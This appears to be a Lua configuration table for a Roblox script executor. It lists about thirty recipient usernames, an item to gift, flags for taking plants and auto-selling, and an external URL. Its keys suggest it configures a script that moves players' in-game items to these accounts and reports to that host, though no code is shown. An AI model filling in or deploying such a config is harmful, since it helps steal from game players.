getgenv().Config = {
    ["Account Main"] = {
        "Hyp3rGhostCraz3",
        "GamerEagleViper2017",
        "Spark_Ne0n2010",
        "Epic_Cod32016",
        "JellyHunter2016YT",
        "G0LD3N_Hawk2012",
        "XX_GabrielPrismMiner",
        "StarSt0rmy46",
        "Galaxy_WRAITH2013YT",
        "Jacks0nOrbitEagle200",
        "XxSparklyFuryPho3nix",
        "Flick_Turb080",
        "DanielDrag0n2008",
        "PixelatedSlimeViper",
        "Bl0ck_Z00m2005YT",
        "XxGhostBanexX2002YT",
        "Blaz3_Primal2019",
        "XxByteDriftBearxX",
        "FlashLavaBlade2011",
        "L3viBuild3rDark20231",
        "Dani3lDanc3rLight",
        "XxFusi0n_Bl0ckxX2003",
        "PandaFrostFusion2020",
        "GRAC3_Alpha2013",
        "WolfTigerPixel2015",
        "PowerGoldenDuck",
        "Will0wQueenAlpha",
        "ELISTAR2015_YT",
        "Xx_GamerBlizzardMast",
        "H3r0AlphaSt3alth",
    },
    ["Item Gift"] = {
        "King Limone",
    },
    ["Take Plants"] = true,
    ["Auto Sell If Found PopUp"] = true,
    ["Custom"] = {
        ["Enable"] = true,
        ["Min"] = 1000,
        ["Max"] = 79000,
    },
    ["Take Brainrots"] = false,
    ["UUID"] = "TD00",
    ["Url"] = "https://yummydata.click"
}
